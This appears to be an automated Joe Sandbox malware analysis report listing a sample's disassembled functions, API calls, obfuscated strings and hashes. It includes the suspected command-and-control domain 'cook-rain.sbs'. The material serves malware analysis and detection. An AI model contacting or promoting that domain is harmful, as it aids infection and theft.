                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: e1fd14ba3f855024b93cd312674fb3384530ce5b407439b276912d964c9fcaf5
                                          • Instruction ID: 07e0a9082e63cdf116e5b461bb395fefaa17de192b635d7c2194d2f8deb99640
                                          • Opcode Fuzzy Hash: e1fd14ba3f855024b93cd312674fb3384530ce5b407439b276912d964c9fcaf5
                                          • Instruction Fuzzy Hash: 88D0A7213A424877D114A61EEC97F27325DC702754F440627A7A2CA2C2D951A915D065
                                          Function 0095CEB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 233 95ceb3-95cee2 CoInitializeSecurity
                                          APIs
                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0095CEC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: InitializeSecurity
                                          • String ID:
                                          • API String ID: 640775948-0
                                          • Opcode ID: 8930e31ca16d65562646b6b675296f6453ccd25cd524d0aa6b4a6e0cf2cf043e
                                          • Instruction ID: 480a1cb79fc3bd20058c2e455a60405c9c1519a4813c33a0373a245283b60032
                                          • Opcode Fuzzy Hash: 8930e31ca16d65562646b6b675296f6453ccd25cd524d0aa6b4a6e0cf2cf043e
                                          • Instruction Fuzzy Hash: 8BD012313EC34176F974860C9C53F1022058705F64F340B09B332FE2E1C9D17141950C
                                          Function 0095D7D3 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 276 95d7d3-95d7d8 CoUninitialize 277 95d7da-95d7e1 276->277
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: Uninitialize
                                          • String ID:
                                          • API String ID: 3861434553-0
                                          • Opcode ID: f656ff43ad9f62686d0056aeec7b0883f6496a8d89a004a209a4ad7ce7233cf8
                                          • Instruction ID: f8c8045966430e37086e292212e110a97522949cbefeadd2c6987a867e9ef7ed
                                          • Opcode Fuzzy Hash: f656ff43ad9f62686d0056aeec7b0883f6496a8d89a004a209a4ad7ce7233cf8
                                          • Instruction Fuzzy Hash: 4BA0113BB00008888B8000A8B8020EEF320E28003AB0002B3C328C2800EA22A2288280

                                          Non-executed Functions

                                          Function 00973D70 Relevance: 24.3, Strings: 19, Instructions: 515COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                                          • API String ID: 1279760036-1524723224
                                          • Opcode ID: dd3e452c7c0462840ef3572d84fe2ae9cf5da84567aba0a32afb08132e022b9c
                                          • Instruction ID: ffb350a4030466505b4afe674c0e5d2b4a9e01001597b11c90177291a4c9ac89
                                          • Opcode Fuzzy Hash: dd3e452c7c0462840ef3572d84fe2ae9cf5da84567aba0a32afb08132e022b9c
                                          • Instruction Fuzzy Hash: 67228CB260C3808FD3219F28C4943AFBBE1AB95314F188D6DE5D987392D77A8845DB53
                                          Function 009594D0 Relevance: 17.9, Strings: 14, Instructions: 385COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                                          • API String ID: 0-1787199350
                                          • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                          • Instruction ID: 3821235d6111a435fb98f2f1d9cff63994e6d8c976be76ce741446db9d67398b
                                          • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                          • Instruction Fuzzy Hash: 24B1E87010C3818FD315CF2A80607ABBFE5AF97345F18496DE8D58B392D779890ACB52
                                          Function 009598F0 Relevance: 11.7, Strings: 9, Instructions: 428COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BB9321930CE9E017D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                          • API String ID: 0-2990117919
                                          • Opcode ID: 88726869b184a321e45550151c67a99f07daf8cccf6dd3472475b1ea15f4e0ff
                                          • Instruction ID: 79d301fd1407cc2c148e8868f140c167d054a07573848faa290c601e22158ca1
                                          • Opcode Fuzzy Hash: 88726869b184a321e45550151c67a99f07daf8cccf6dd3472475b1ea15f4e0ff
                                          • Instruction Fuzzy Hash: 05E15D72A483508BD324CF36C85136BBBE6EBD1314F198A2DE9E58B395D734C809CB42
                                          Function 00B15C78 Relevance: 10.3, Strings: 7, Instructions: 1589COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .`{$=0}w$dC?g$e&~$#[$#[$bw>
                                          • API String ID: 0-6439773
                                          • Opcode ID: cd2eaf400f6b9e4e80e446027cb6ce177d5ab8444c9eb6c6b0513d412e99934a
                                          • Instruction ID: 31181eb35cd1d582626ba5c12c80c5128797f4669e9edf9132ac6199826b8260
                                          • Opcode Fuzzy Hash: cd2eaf400f6b9e4e80e446027cb6ce177d5ab8444c9eb6c6b0513d412e99934a
                                          • Instruction Fuzzy Hash: 41B2F3F3A0C2009FE304AE29DC8567AFBE5EF94720F16893DE6C4C7744EA3598458796
                                          Function 00B22338 Relevance: 9.6, Strings: 7, Instructions: 805COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: U$2zm"$L'w$L'w$SnT$i|$xAO
                                          • API String ID: 0-2499630841
                                          • Opcode ID: f6afefd746103d69dcfd7d55f6465d9c1e29148f5352e4fecba13a550ae3707b
                                          • Instruction ID: 719f6585735a7f5852b2a65cd6e8a68cc228bb952b1c5fd40d94da9615e5ec1c
                                          • Opcode Fuzzy Hash: f6afefd746103d69dcfd7d55f6465d9c1e29148f5352e4fecba13a550ae3707b
                                          • Instruction Fuzzy Hash: E64207B360C314AFE3046E2DEC8567AF7E5EF94720F1A4A3DE6C483744EA3558418697
                                          Function 0096DB30 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                                          • API String ID: 0-3274379026
                                          • Opcode ID: 8b48ac208c5107d484f978683f7eabed457e4a906544c2b868d1399e3fd378ac
                                          • Instruction ID: e18594b3c9ada7e3b132917f6342c0277797463e3c410f245be945ab1dd2cacd
                                          • Opcode Fuzzy Hash: 8b48ac208c5107d484f978683f7eabed457e4a906544c2b868d1399e3fd378ac
                                          • Instruction Fuzzy Hash: 65515971A193518BD320CF25C8902ABB7F6FFD2341F18895CE8D18B295EB788906C792
                                          Function 00B1C836 Relevance: 7.9, Strings: 5, Instructions: 1621COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $jy$O9bM$\co$_zJn$S~W
                                          • API String ID: 0-3200088448
                                          • Opcode ID: d169d53575233063eb6868d4d3f2d5e4c70d98fbe5d0fe053789b2ff54782f5a
                                          • Instruction ID: d881bfc1720706f0213732b49438885f72f511d539ba4a163b6b9900feb89065
                                          • Opcode Fuzzy Hash: d169d53575233063eb6868d4d3f2d5e4c70d98fbe5d0fe053789b2ff54782f5a
                                          • Instruction Fuzzy Hash: A9B2F7F36082049FE304AE2DEC8577ABBE9EFD4720F1A893DE6C4C7744E63558058696
                                          Function 00B141FF Relevance: 6.6, Strings: 4, Instructions: 1650COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6'N$v^#^$;~$tu
                                          • API String ID: 0-2988868443
                                          • Opcode ID: 2e9d351e18cde9d5527a9a27837e85131efbf9511378b21fffb51567cad47e2e
                                          • Instruction ID: 094f85d15c392bb3ba9a03599f0f4aec1ef3e89365a516c9a216c45819a03fbe
                                          • Opcode Fuzzy Hash: 2e9d351e18cde9d5527a9a27837e85131efbf9511378b21fffb51567cad47e2e
                                          • Instruction Fuzzy Hash: EEB2F8F360C204AFE304AE2DEC8567BB7E9EF94720F1A853DE6C583744E63558058696
                                          Function 0095E35B Relevance: 6.5, Strings: 5, Instructions: 295COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Lk$U\$Zb$cook-rain.sbs$r
                                          • API String ID: 0-1143509894
                                          • Opcode ID: 50bbe559b3c1c8e1ba26577e69a880eb6760ebb236f9eb2ec2b1fd4bd5d1fbad
                                          • Instruction ID: b0b72744329529d0bb5c6b7117f264a5ca635cf9515b685b538946f8819d76c0
                                          • Opcode Fuzzy Hash: 50bbe559b3c1c8e1ba26577e69a880eb6760ebb236f9eb2ec2b1fd4bd5d1fbad
                                          • Instruction Fuzzy Hash: 3CA1BE7010C3D18AD779CF26D4947EFBBE1AB93308F18895DD4E94B292E739460A8B47
                                          Function 00959210 Relevance: 6.5, Strings: 5, Instructions: 269COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733414990.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733482635.00000000009A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733501177.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733812558.0000000000C53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733944953.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1733967926.0000000000DEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: )=+4$57$7514$84*6$N
                                          • API String ID: 0-4020838272
                                          • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                          • Instruction ID: 8bf1750eaf05d6e2b07684a23e607976ed1170e982539d622e664e0322536b27
                                          • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                          • Instruction Fuzzy Hash: EB71A16110C3D28BE315CF2A84A037BFFE59FA2305F18499DE4D64B292D779890AC752
                                          Function 00970870 Relevance: 5.9, Strings: 4, Instructions: 861COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1733414990.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                          • Associated: 00000000.00000002.1733394041.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
